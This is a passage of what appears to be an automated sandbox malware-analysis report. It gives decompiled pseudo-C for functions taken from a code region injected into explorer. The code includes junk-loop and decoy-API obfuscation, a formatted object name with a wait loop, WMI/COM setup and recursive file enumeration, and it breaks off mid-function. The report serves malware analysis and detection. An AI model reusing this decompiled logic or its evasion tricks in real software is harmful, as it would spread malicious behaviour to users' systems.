String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3345665715-2706916422
Opcode ID: 7e31a7555489e11cc84083bde87e6c75f6b4f8f84aaa174dcad23454f7fc6639
Instruction ID: e4fec6b7c4be0ba60b5435adbfc7347e9c347b895261bcf88e2e996c13fa63d6
Opcode Fuzzy Hash: 7e31a7555489e11cc84083bde87e6c75f6b4f8f84aaa174dcad23454f7fc6639
Instruction Fuzzy Hash: 39B14F72A00609ABD710EFB4DC49FEAB7ACFF08301F044569F619D7152EB74A648AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F570F4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 179
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00F570F4(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v60;
				char _v348;
				signed int _v352;
				signed int _v356;
				intOrPtr _v360;
				void* __edi;
				void* __esi;
				intOrPtr _t45;
				signed int _t57;
				intOrPtr _t58;
				WCHAR* _t59;
				intOrPtr _t66;
				signed int _t71;
				intOrPtr _t75;
				intOrPtr _t78;
				intOrPtr _t83;
				void* _t93;
				signed int _t97;
				void* _t98;

				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t45 =  *0xf89720; // 0xf90000
				E00F6D1ED(_t45,  *((intOrPtr*)(_t45 + 0x224)));
				E00F5ABD0();
				E00F5B749();
				while(0 != 0) {
				}
				E00F544E2();
				E00F5F33E();
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						goto L6;
					}
				}
				while(1) {
					L6:
					__eflags = 0;
					if(0 == 0) {
						goto L8;
					}
				}
				while(1) {
					L8:
					__eflags = 0;
					if(0 == 0) {
						goto L10;
					}
				}
				while(1) {
					L10:
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				BitBlt(0, 0x58, 0x44, 0x63, 0x19, 0, 1, 0x60, 0x63);
				_t57 = E00F5AC58(0x20a);
				_pop(_t93);
				_v8 = _t57;
				__eflags = _v8;
				if(_v8 != 0) {
					_t58 =  *0xf89720; // 0xf90000
					_t59 = _t58 + 0x228;
					__eflags = _t59;
					lstrcpynW(_v8, _t59, 0x20a);
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v12 = E00F6D3A8(_t93,  *0xf89784,  *0xf89788, _v8,  &_v16);
					__eflags = _v12;
					if(_v12 >= 0) {
						__eflags = _v16;
						if(_v16 == 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									goto L50;
								}
							}
						} else {
							_t71 =  *0xf89780; // 0x0
							__eflags = _t71 & 0x00000001;
							if((_t71 & 0x00000001) != 0) {
								L47:
							} else {
								_v24 = _v24 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								_v28 = _v28 & 0x00000000;
								_t98 = 0x20;
								E00F5CFBA(_t98,  &_v60);
								_t75 =  *0xf89740; // 0x547f6c8
								_v28 =  *((intOrPtr*)(_t75 + 0xc4))(0, 0, 0,  &_v60, "p%08x",  *0xf8977c);
								__eflags = _v28;
								if(_v28 != 0) {
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											goto L31;
										}
									}
									do {
										L31:
										_t78 =  *0xf89740; // 0x547f6c8
										_v24 =  *((intOrPtr*)(_t78 + 0x2c))(_v28, 0x2710);
										_v352 = _v24;
										__eflags = _v352;
										if(_v352 == 0) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_v20 = 1;
										} else {
											__eflags = _v352 - 0x102;
											if(_v352 == 0x102) {
												while(1) {
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
											} else {
												while(1) {
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
												_v20 = 1;
											}
										}
										__eflags = _v20;
									} while (_v20 == 0);
									__imp__GetCPInfoExA(0x21, 0x4c,  &_v348);
									_t83 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t83 + 0x30))(_v28);
									_v24 = _v16( *0xf89784, 0, 0);
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											goto L47;
										}
									}
									goto L47;
								} else {
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
								}
							}
						}
					} else {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
					}
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					while(1) {
						L50:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t66 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t66 + 0xdc))(0);
					_v360 = E00F5CEF9(_t97, 0);
					_v356 = _t97;
					__eflags = _v356;
					if(__eflags <= 0) {
						if(__eflags < 0) {
							L55:
							CreateEnhMetaFileA(0, "p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btqpLK96CAU,68rqkHtQIaqOxVc JNdP  SZO.DbGwp9VIS Kjh JoOr6ZcF,HE4AdiT,J uub0 KkOTfmDLpwJ51QbkiUhVZHqPQ hyniAMQXRZ5kT 7etjmEcp0nM1GGVVtzeS5ZW jui uS.v.WnxIfdxyvC jn6QJF.VtJh5QRInstHcu3Xy7UYYJjBPTGVtrAxqAkBlbR xwIrMVo7PBKO8 mwTp I1.Uw8d7l2DPxnV TS6k1pMNSl5Ifq8aMe xkorrTgQ.MPDyrtLYL0Xp5c173VPUppWpgi5tuZxZ3xJBeHg4E,XSHAN,asdFb 15w4Yjv3Sb8J v,LrFPUavTPjM20oTCfVCbhJYX5dBY0 FXY3WFSw6kkCIOPsBfdZqxAdh8Q1Q.ZEhMaj.QI4 XIJK2D feDA0sbowdMD0DTseXSbfLCL1qU,zh5s4qjz.rYEc7 UVwHrPGfCIQapdDCsOqDUFCmDZWW6S3ZxmAsODYIshg5znOqFBOOne8W96Xno TfSmEqbEyLne9csTniQN7m27rubkUsXgJZXZ1AZoifG7Qsr,P 19zSa6dOQ83Izi55Twq8Q9  VlgW1DNue6f69A85TPayKQ2632,fpvv2gwYyd9IJQKjxio0ZuntLQazpTw84wjg RabRLv5r.BghOeb, 32ArEm91SEO.oC,ZOQxckJ0jvBAuuk7YQ.UQdVLlrPidIpyinP9xdqqC6V93qpzwvtvt1tx0ry7mcChmGlVCXb4Mf.HT14JzrT,zKnUWUx pP s,8TgVDt.viommjbtyB8YJtfdS6SDLEJx6  2KfI0l7NDAuC9gN70g9h5QcBU7fTCKzEZGXS9CO9imQGo97fwISMozzSF6esABticErfTs 0T3QfV GXMTiFqLWuQRp17vZn  a6 B7U4ymzbQO6ir7IUbc4eiaxvok6KQdpRQTxUX9rsEv9hkTH1ARTfrCjDK3 0N2dmotewb9lsPEjf3pIr3pFt9qt,sl49,iWeeidUxpaVtvuASL4IfgegYsdPQr2O0ffJ5vpnEFSkKnWNUklkr qoIb1 Cy,V1PcZV HHAwXoewfCwc7KuIACK.fOgcBU0.J0uSS5YQy02qhji3Zj BUANa7qGH  WLoDxFL1E3hfesZwBN1Gv,cizaE.Uu F3LyBXmNwjhr54.mdGMx1pZiEAJLBAG.5uIHaXkNIkz2E0krJPDjXgWbM lYq2YOyn6vYr.DLce.mZwd6,itYSf393FDfpzN5hEz1EuPKzzMRgstQjukcovpDT 6wIi5nF.7dSXnZJ,MMyf5rWL0HgyWrPMzWZc.4J. ZdDHR7 DJFQLCL7o97cSsD3l19QwAvqOhK3vt6dUW1H3Nlk9dU3Cyf6aR.,FYTs C,itSeLOKy7xbL OFFD1aPybiKLXtTqLna L.9aqj3SF eVI 0OUjCaonTCBUIqksTWKagfc9Ga1PUE.8NkyiaYE80pLWrWPut 54 I26Lghi ymQ0.SGT vWXBjfNnAOLxbeXdiaW dH KGHt22vh6LF0kbZu6Qh7V322o7o7MSRq.NvC7AyoRKP5RLJb,IYAXZGSKpTz1SbMUtwU4NZbx6nJMp1pSbc", 0, 0);
						} else {
							__eflags = _v360 - 0x2bcf;
							if(_v360 < 0x2bcf) {
								goto L55;
							}
						}
					}
					__eflags = 0;
					return 0;
				}
				goto L50;
			}

0x00f570f4
0x00f570ff
0x00f57103
0x00f57107
0x00f57112
0x00f57118
0x00f5711d
0x00f57122
0x00f57126
0x00f57128
0x00f5712d
0x00f57132
0x00f57132
0x00f57134
0x00000000
0x00000000
0x00f57136
0x00f57138
0x00f57138
0x00f57138
0x00f5713a
0x00000000
0x00000000
0x00f5713c
0x00f5713e
0x00f5713e
0x00f5713e
0x00f57140
0x00000000
0x00000000
0x00f57142
0x00f57144
0x00f57144
0x00f57144
0x00f57146
0x00000000
0x00000000
0x00f57148
0x00f5715c
0x00f57167
0x00f5716c
0x00f5716d
0x00f57170
0x00f57174
0x00f5718b
0x00f57190
0x00f57190
0x00f57199
0x00f5719f
0x00f5719f
0x00f571a1
0x00000000
0x00000000
0x00f571a3
0x00f571c0
0x00f571c3
0x00f571c7
0x00f571d9
0x00f571dd
0x00f572da
0x00f572da
0x00f572dc
0x00000000
0x00000000
0x00f572de
0x00f571e3
0x00f571e3
0x00f571e8
0x00f571eb
0x00f572d8
0x00f571f1
0x00f571f1
0x00f571f5
0x00f571f9
0x00f5720a
0x00f5720e
0x00f5721f
0x00f5722a
0x00f5722d
0x00f57231
0x00f57243
0x00f57243
0x00f57245
0x00000000
0x00000000
0x00f57247
0x00f57249
0x00f57249
0x00f57251
0x00f57259
0x00f5725f
0x00f57265
0x00f5726c
0x00f5727c
0x00f5727c
0x00f5727e
0x00000000
0x00000000
0x00f57280
0x00f57282
0x00f5726e
0x00f5726e
0x00f57278
0x00f5728b
0x00f5728b
0x00f5728d
0x00000000
0x00000000
0x00f5728f
0x00f5727a
0x00f57293
0x00f57293
0x00f57295
0x00000000
0x00000000
0x00f57297
0x00f57299
0x00f57299
0x00f57278
0x00f572a0
0x00f572a0
0x00f572b1
0x00f572ba
0x00f572bf
0x00f572cf
0x00f572d2
0x00f572d2
0x00f572d4
0x00000000
0x00000000
0x00f572d6
0x00000000
0x00f57233
0x00f57233
0x00f57233
0x00f57235
0x00000000
0x00000000
0x00f57237
0x00f57239
0x00f57231
0x00f571eb
0x00f571c9
0x00f571c9
0x00f571c9
0x00f571cb
0x00000000
0x00000000
0x00f571cd
0x00f571cf
0x00f57176
0x00f57176
0x00f57176
0x00f57178
0x00000000
0x00000000
0x00f5717a
0x00f572e0
0x00f572e0
0x00f572e0
0x00f572e2
0x00000000
0x00000000
0x00f572e4
0x00f572e8
0x00f572ed
0x00f572fb
0x00f57301
0x00f57307
0x00f5730e
0x00f57310
0x00f5731e
0x00f57329
0x00f57312
0x00f57312
0x00f5731c
0x00000000
0x00000000
0x00f5731c
0x00f57310
0x00f5732f
0x00f57334
0x00f57334
0x00000000

APIs

Part of subcall function 00F5ABD0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00F548DB), ref: 00F5ABD9

BitBlt.GDI32(00000000,00000058,00000044,00000063,00000019,00000000,00000001,00000060,00000063), ref: 00F5715C
CreateEnhMetaFileA.GDI32(00000000,p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq,00000000,00000000), ref: 00F57329

Strings

p%08x, xrefs: 00F57203
p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq, xrefs: 00F57322

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Create$FileHeapMeta
String ID: p%08x$p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq
API String ID: 2045902044-2228781949
Opcode ID: 11b0dac8fe2c494871bb0c8bf64361fa8a4c5d678be6e2da785b38b5df3d873a
Instruction ID: 127deb4bfbec42f819531aa02704319070b451cf4f3a9a99beb1568af0fab604
Opcode Fuzzy Hash: 11b0dac8fe2c494871bb0c8bf64361fa8a4c5d678be6e2da785b38b5df3d873a
Instruction Fuzzy Hash: 32513271A5C709EBDB20BB60EC0ABB977B1AB04313F240055BF05A51D1D6B54A8CFF56

Uniqueness

Uniqueness Score: -1.00%

Function 00F626A6, Relevance: 7.6, APIs: 5, Instructions: 86
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00F626A6(void* __ecx, void* __edi, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char* _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr* _t19;
				void* _t22;
				intOrPtr* _t26;
				void* _t34;

				_v8 = 0;
				_v12 = 0;
				__imp__CoInitializeEx(0, 0, _t34, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t16 =  &_v8;
				__imp__CoCreateInstance(0xf721dc, 0, 1, 0xf7210c, _t16);
				if(_t16 < 0) {
					L4:
					_t17 = _v12;
					if(_t17 != 0) {
						 *((intOrPtr*)( *_t17 + 8))(_t17);
					}
					_t18 = _v8;
					if(_t18 != 0) {
						 *((intOrPtr*)( *_t18 + 8))(_t18);
					}
					_t19 = 0;
				} else {
					__imp__#2(_a4, __edi);
					_t26 = _v8;
					_t22 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _t16, 0, 0, 0, 0, 0, 0,  &_v12);
					if(_t22 < 0) {
						goto L4;
					} else {
						__imp__CoSetProxyBlanket(_v12, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t22 < 0) {
							goto L4;
						} else {
							_t19 = E00F5AC58(8);
							if(_t19 != 0) {
								 *((intOrPtr*)(_t19 + 4)) = _v8;
								 *_t19 = _v12;
							} else {
								goto L4;
							}
						}
					}
				}
				return _t19;
			}

0x00f626b0
0x00f626b3
0x00f626b6
0x00f626c7
0x00f626cd
0x00f626de
0x00f626e6
0x00f6272e
0x00f6272e
0x00f62733
0x00f62738
0x00f62738
0x00f6273b
0x00f62740
0x00f62745
0x00f62745
0x00f62748
0x00f626e8
0x00f626ec
0x00f626f2
0x00f62703
0x00f62709
0x00000000
0x00f6270b
0x00f62718
0x00f62720
0x00000000
0x00f62722
0x00f62724
0x00f6272c
0x00f6274f
0x00f62755
0x00000000
0x00000000
0x00000000
0x00f6272c
0x00f62720
0x00f62709
0x00f62759

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,?,?,00F62375,00000000,000002B6,0000003F,00000000,00000000,?,?,?,?), ref: 00F626B6
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,00F62375,00000000,000002B6,0000003F), ref: 00F626C7
CoCreateInstance.OLE32(00F721DC,00000000,00000001,00F7210C,00000000,?,?,?,00F62375,00000000,000002B6,0000003F,00000000,00000000,?,?), ref: 00F626DE
SysAllocString.OLEAUT32(00000000), ref: 00F626EC
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,00F62375,00000000,000002B6,0000003F,00000000,00000000), ref: 00F62718

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: a2e171ea2e5f24369a62b0c3e5de0b2242279651dacf5e492324f439bb81393a
Instruction ID: 48789934374e1b4bb97aa608993ad443177f3eb88da801a80873d209fe43ecc6
Opcode Fuzzy Hash: a2e171ea2e5f24369a62b0c3e5de0b2242279651dacf5e492324f439bb81393a
Instruction Fuzzy Hash: 28219D34602228BBDB218B65CC4CECF7F6DEF46BA0F104148F509EA190C770AA41EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F5AEE4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 131
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00F5AEE4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _v12;
				char _v16;
				WCHAR* _v20;
				intOrPtr _v568;
				short _v570;
				struct _WIN32_FIND_DATAW _v616;
				WCHAR* _t56;
				void* _t57;
				signed int _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				char _t69;
				intOrPtr _t73;
				intOrPtr _t76;
				void* _t79;
				intOrPtr _t80;
				signed char _t82;
				intOrPtr _t88;
				signed int _t89;
				void* _t90;
				void* _t91;

				_t89 = 0;
				_push(0);
				_push(L"\\*");
				_t56 = E00F5B60A(_a4);
				_t91 = _t90 + 0xc;
				_v20 = _t56;
				if(_t56 == 0) {
					return _t56;
				}
				_t57 = FindFirstFileW(_t56,  &_v616);
				_v12 = _t57;
				if(_t57 == 0xffffffff) {
					L28:
					return E00F5AB81( &_v20, 0xfffffffe);
				} else {
					_t82 = _a16;
					_t88 = _a8;
					do {
						if(_a28 == _t89) {
							L5:
							if(_v616.cFileName != 0x2e || _v570 != _t89 && (_v570 != 0x2e || _v568 != _t89)) {
								_t61 = _v616.dwFileAttributes & 0x00000010;
								if(_t61 == 0 || (_t82 & 0x00000002) == 0) {
									if(_t61 != _t89 || (_t82 & 0x00000004) == 0) {
										goto L20;
									} else {
										goto L13;
									}
								} else {
									L13:
									if(_a12 <= 0) {
										L19:
										_t89 = 0;
										L20:
										if((_v616.dwFileAttributes & 0x00000010) != 0 && (_t82 & 0x00000001) != 0) {
											_push(_t89);
											_push( &(_v616.cFileName));
											_push("\\");
											_t69 = E00F5B60A(_a4);
											_t91 = _t91 + 0x10;
											_v16 = _t69;
											if(_t69 != _t89) {
												if(_a32 != _t89) {
													_t73 =  *0xf89740; // 0x547f6c8
													 *((intOrPtr*)(_t73 + 0xb4))(_a32);
												}
												E00F5AEE4(_v16, _t88, _a12, _t82, _a20, _a24, _a28, _a32, _a36);
												_t91 = _t91 + 0x24;
												E00F5AB81( &_v16, 0xfffffffe);
											}
										}
										goto L26;
									} else {
										goto L14;
									}
									do {
										L14:
										_push( *((intOrPtr*)(_t88 + _t89 * 4)));
										_push( &(_v616.cFileName));
										_t76 =  *0xf89724; // 0x547f930
										if( *((intOrPtr*)(_t76 + 0x18))() == 0) {
											goto L18;
										}
										_t79 = _a20(_a4,  &_v616, _a24);
										_t91 = _t91 + 0xc;
										if(_t79 == 0) {
											goto L19;
										} else {
											if(_a36 != 0) {
												_t80 =  *0xf89740; // 0x547f6c8
												 *((intOrPtr*)(_t80 + 0xb4))(_a36);
											}
										}
										L18:
										_t89 = _t89 + 1;
									} while (_t89 < _a12);
									goto L19;
								}
							} else {
								goto L26;
							}
						}
						_t64 =  *0xf89740; // 0x547f6c8
						_push(_t89);
						_push(_a28);
						if( *((intOrPtr*)(_t64 + 0x2c))() != 0x102) {
							break;
						}
						goto L5;
						L26:
					} while (FindNextFileW(_v12,  &_v616) != 0);
					_t66 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t66 + 0x78))(_v12);
					goto L28;
				}
			}

0x00f5aef0
0x00f5aef2
0x00f5aef3
0x00f5aefb
0x00f5af00
0x00f5af03
0x00f5af08
0x00f5b080
0x00f5b080
0x00f5af16
0x00f5af1c
0x00f5af22
0x00f5b06f
0x00000000
0x00f5af28
0x00f5af28
0x00f5af2b
0x00f5af2e
0x00f5af31
0x00f5af4a
0x00f5af52
0x00f5af7e
0x00f5af81
0x00f5af8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00f5af91
0x00f5af91
0x00f5af95
0x00f5afde
0x00f5afde
0x00f5afe0
0x00f5afe7
0x00f5afee
0x00f5aff5
0x00f5aff6
0x00f5affe
0x00f5b003
0x00f5b006
0x00f5b00b
0x00f5b010
0x00f5b015
0x00f5b01a
0x00f5b01a
0x00f5b037
0x00f5b03c
0x00f5b045
0x00f5b04b
0x00f5b00b
0x00000000
0x00000000
0x00000000
0x00000000
0x00f5af97
0x00f5af97
0x00f5af97
0x00f5afa0
0x00f5afa1
0x00f5afab
0x00000000
0x00000000
0x00f5afba
0x00f5afbd
0x00f5afc2
0x00000000
0x00f5afc4
0x00f5afc8
0x00f5afcd
0x00f5afd2
0x00f5afd2
0x00f5afc8
0x00f5afd8
0x00f5afd8
0x00f5afd9
0x00000000
0x00f5af97
0x00000000
0x00000000
0x00000000
0x00f5af52
0x00f5af33
0x00f5af38
0x00f5af39
0x00f5af44
0x00000000
0x00000000
0x00000000
0x00f5b04c
0x00f5b05c
0x00f5b067
0x00f5b06c
0x00000000
0x00f5b06c

APIs

Part of subcall function 00F5B60A: lstrcatW.KERNEL32(00000000,00000000), ref: 00F5B64A

FindFirstFileW.KERNEL32(00000000,?,00F63261,00F897FC,00000000), ref: 00F5AF16
FindNextFileW.KERNEL32(00000001,00000010), ref: 00F5B056

Strings

., xrefs: 00F5AF61
., xrefs: 00F5AF4A

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextlstrcat
String ID: .$.
API String ID: 4165875925-3769392785
Opcode ID: 3a45a3f032caa1e7a3f03b24e56260f0f210dca41df6dc02a216f06b2535d96b
Instruction ID: bdd6b84eaec66b1aff213da303f94fe2a9fff5b883907bd6637cf363c18676cf
Opcode Fuzzy Hash: 3a45a3f032caa1e7a3f03b24e56260f0f210dca41df6dc02a216f06b2535d96b
Instruction Fuzzy Hash: FA418D71C04219AFCF21AF54DC49AEE7BB5FF04362F040291FE24A20A1D7759DA8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F5CEF9, Relevance: 3.0, APIs: 2, Instructions: 22
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F5CEF9(intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v16;
				intOrPtr _t8;
				intOrPtr* _t11;
				intOrPtr _t12;

				_t12 = __edx;
				GetSystemTimeAsFileTime( &_v16);
				asm("sbb eax, 0x19db1de");
				_t8 = E00F70780(_v16.dwLowDateTime - 0xd53e8000, _v16.dwHighDateTime, 0x989680, 0);
				_t11 = _a4;
				if(_t11 != 0) {
					 *_t11 = _t8;
					 *((intOrPtr*)(_t11 + 4)) = _t12;
					return _t8;
				}
				return _t8;
			}

0x00f5cef9
0x00f5cf03
0x00f5cf1c
0x00f5cf23
0x00f5cf28
0x00f5cf2d
0x00f5cf2f
0x00f5cf31
0x00000000
0x00f5cf31
0x00f5cf35

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00F54CCA,00000000), ref: 00F5CF03
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5CF23

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 31ce03d54fc738eb82219b8d340f83c3f8e7f24df38e81bd6d32bc07e5fe7855
Instruction ID: 0bf8b80b80714b5014b66183b1d940f6c6de38d4bff097a685258d3ca856e6b2
Opcode Fuzzy Hash: 31ce03d54fc738eb82219b8d340f83c3f8e7f24df38e81bd6d32bc07e5fe7855
Instruction Fuzzy Hash: 49E04F79A01208BBCB18EF78C945FADBBF9EB44705F448558AD07DB280D671EA05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00F6280D, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 375
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00F6280D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v12;
				char _v16;
				signed int _v20;
				void* _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				short _v64;
				signed int _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v608;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t164;
				char _t170;
				signed int _t177;
				intOrPtr* _t181;
				signed int _t182;
				signed int _t187;
				intOrPtr* _t188;
				signed int _t190;
				intOrPtr* _t195;
				signed int _t196;
				signed int _t199;
				intOrPtr* _t200;
				intOrPtr _t209;
				char _t215;
				signed int _t217;
				intOrPtr* _t218;
				intOrPtr _t220;
				intOrPtr* _t221;
				signed int _t222;
				signed int _t225;
				intOrPtr _t226;
				signed int _t228;
				intOrPtr _t242;
				intOrPtr _t244;
				char* _t246;
				intOrPtr* _t247;
				intOrPtr* _t252;
				void* _t257;
				void* _t279;
				intOrPtr _t283;
				intOrPtr _t284;
				intOrPtr _t297;
				intOrPtr _t298;
				void* _t314;
				signed int _t316;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t320;
				intOrPtr* _t322;
				intOrPtr* _t323;
				intOrPtr* _t324;

				_t314 = 0;
				_v36 = 0;
				_v40 = 0;
				_t252 = E00F626A6(__ecx, 0, _a4);
				_v80 = _t252;
				if(_t252 != 0) {
					_t164 = E00F5AC58(0x10);
					_pop(_t257);
					_v32 = _t164;
					__eflags = _t164;
					if(_t164 == 0) {
						L53:
						E00F5AB81( &_v40, 0xfffffffe);
						E00F62154( &_v80);
						return _v32;
					}
					_v20 = E00F62CCE(_t257, 0x84b);
					 *_t323 = 0xe02;
					_t170 = E00F62CCE(_t257);
					_push(0);
					_push(_a8);
					_v52 = _t170;
					_push(_t170);
					_push(_a12);
					_v40 = E00F5B60A(_v20);
					E00F5BA86( &_v20);
					E00F5BA86( &_v52);
					_t324 = _t323 + 0x20;
					__eflags = _v40;
					if(_v40 != 0) {
						_t318 = __imp__#2;
						_v56 =  *_t318(_v40);
						_t177 = E00F62CCE(_t257, 0x5e9);
						_v20 = _t177;
						_v52 =  *_t318(_t177);
						E00F5BA86( &_v20);
						_t181 =  *_t252;
						_t182 =  *((intOrPtr*)( *_t181 + 0x50))(_t181, _v52, _v56, 0, 0,  &_v36);
						__eflags = _t182;
						if(_t182 != 0) {
							L52:
							_t319 = __imp__#6;
							 *_t319(_v56);
							 *_t319(_v52);
							goto L53;
						}
						_v24 = 0;
						_v20 = 0;
						while(1) {
							__eflags = _v36 - _t314;
							if(_v36 == _t314) {
								break;
							}
							_t187 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, 0xea60, 1,  &_v24,  &_v88);
							__eflags = _t187;
							if(_t187 != 0) {
								L48:
								_t188 = _v36;
								 *((intOrPtr*)( *_t188 + 8))(_t188);
								_t190 = _v20;
								__eflags = _t190 - _t314;
								if(_t190 <= _t314) {
									E00F5AB81( &_v32, _t314);
								} else {
									_t320 = _v32;
									 *((intOrPtr*)(_t320 + 8)) = _t190;
									 *_t320 = E00F5B6B3(_a4);
									 *((intOrPtr*)(_t320 + 4)) = E00F5B6B3(_a8);
								}
								goto L52;
							}
							_v16 = _t314;
							_v44 = _t314;
							_v12 = _t314;
							_v28 = _t314;
							__eflags = _v88 - _t314;
							if(_v88 == _t314) {
								goto L48;
							}
							_t195 = _v24;
							_t196 =  *((intOrPtr*)( *_t195 + 0x1c))(_t195, _t314, 0x40, _t314,  &_v28);
							__eflags = _t196;
							if(_t196 >= 0) {
								__imp__#20(_v28, 1,  &_v16);
								__imp__#19(_v28, 1,  &_v44);
								_t316 = _v20 << 3;
								_t322 = _v32 + 0xc;
								_t48 = _t316 + 8; // 0xf5a170
								_t199 = E00F5AC9A(_t48, _t322, _t316);
								__eflags = _t199;
								if(_t199 == 0) {
									L47:
									__imp__#16(_v28);
									_t200 = _v24;
									 *((intOrPtr*)( *_t200 + 8))(_t200);
									_t314 = 0;
									__eflags = 0;
									goto L48;
								}
